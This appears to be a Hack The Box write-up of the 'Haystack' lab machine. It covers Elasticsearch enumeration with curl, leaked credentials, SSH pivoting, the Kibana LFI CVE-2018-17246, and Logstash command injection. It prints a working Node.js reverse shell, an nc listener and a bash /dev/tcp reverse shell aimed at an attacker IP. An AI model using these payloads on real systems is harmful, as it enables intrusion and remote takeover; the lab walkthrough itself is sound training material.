
hello fellow hackers, today im going to solve Haystack from hack the box so lets get started!!!
i started with nmap to check for open ports and services
nmap -A -v -sT 10.10.10.115

so the machine has 3 port open :
1- SSH on port 22
2-nginx web server running on ports 80 and 9200
lets go to for the web server
after opening the web server on port 80 i found a image for a needle in a hay?, and nothing else

now lets check port 9200

its an Elasticsearch database , and after some google search , i can access it using curl
curl -X POST "10.10.10.115:9200/_xpack/sql?format=txt&pretty" -H 'Content-Type: application/json' -d'
{
"query": "SHOW TABLES"
}

lets check out quotes table ….
curl -X POST "10.10.10.115:9200/_xpack/sql?format=txt&pretty" -H 'Content-Type: application/json' -d' { "query": "desc quotes" }

lets go for quotes.keword column … ,
curl -X POST "10.10.10.115:9200/_xpack/sql?format=txt&pretty" -H 'Content-Type: application/json' -d' { "query": "select quotes.keword from quotes " } > quotes_haystack.txt

and we have a haystack of Spanish words but in the top of it its says : there is a needle in this haystack you need to find it
after some translating and searching i found two base64s


after decoding the base64s we have a user and a password
user : security
pass: spanish.is.key
no lets ssh to the box !!!
ssh [email protected]

and we have the user flag !!!
now let go for the privilege escalation
after some enumeration i found that Kibana is running in localhost, so we need to pivot int other to see whats going on
so to pivot inside i used ssh
ssh -R 8080:127.0.0.1:5601 [email protected]
and now we can access kibana from our machine

after some enum i found that its vulnerable to CVE-2018-17246 LFI
first we need to create a JavaScript revers shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1998, "10.10.14.85", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
now lets set our listener
nc -vlp 1998
now we have to include our file
https://127.0.0.1:8080/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../…/../../../tmp/shell.js
and we have a shell as kibana user !!!

now for the root part
after some enum i found that logstash is running as a root and we an access some of its files

so the input part indicates that every 10 seconds it is searching for files named like “ logstash_* ” in the folder /opt/kibana . This files will be of type “execute” .
In the filter part you can see that for files of type “ execute ” it will search a string like: Ejecutar comando : COMMAND
Finally, in the output part it is indicated that the value of “ comando ” will be executed
so in order to exploit it we need to inject our command inside logstash files in /opt/kibana
echo “Ejecutar comando : bash -i >&/dev/tcp/10.10.14.85/6666 0>&1” > /opt/kibana/logstash_12345
and we are root !!!

SMT Red Team